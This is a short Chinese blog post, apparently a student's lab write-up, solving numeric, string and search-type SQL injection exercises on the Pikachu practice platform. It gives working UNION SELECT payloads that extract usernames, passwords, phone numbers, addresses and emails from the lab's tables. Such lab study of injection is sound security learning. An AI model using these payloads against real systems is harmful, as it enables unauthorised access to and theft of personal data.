web实验三——pikachu之sql注入

时间：2019-12-13 18:55:03 阅读：134 评论：0 收藏：0 [点我收藏+]

（一）数字型注入

技术分享图片

首先更改1项的值构造payload找到注入点，之后构造payload注出其他信息

技术分享图片

查表名

技术分享图片

查字段名

最终输入payload：

value="1 union select concat(id,‘|‘,username,‘|‘,password,‘|‘,level),2 from users"

结果

技术分享图片

（二）字符型注入

使用单引号跳出字符串，最后使用＃注释掉多余sql语句，跳过前面查表名字段名的步骤，直接给出最后payload：

‘ union select id,concat(username,‘|‘,pw,‘|‘,sex,‘|‘,phonenum,‘|‘,address,‘|‘,email) from member#

技术分享图片

（三）搜索型注入

搜索型查询使用的是如下格式sql语句：

select username from user where username like ‘%{$username}%‘;

此时可将{$username}部分构造成payload：

a%‘ union select 1 from member#

此时执行的sql语句为：

select username from user where username like ‘%a%‘ union select 1 from member#%‘;

因此构造最后的payload：

a%‘ union select 1,id,concat(username,‘|‘,pw,‘|‘,sex,‘|‘,phonenum,‘|‘,address,‘|‘,email) from member#

技术分享图片

原文：https://www.cnblogs.com/p201721430024/p/12036732.html

踩

(0)

评论一句话评论（0）

分享档案

更多>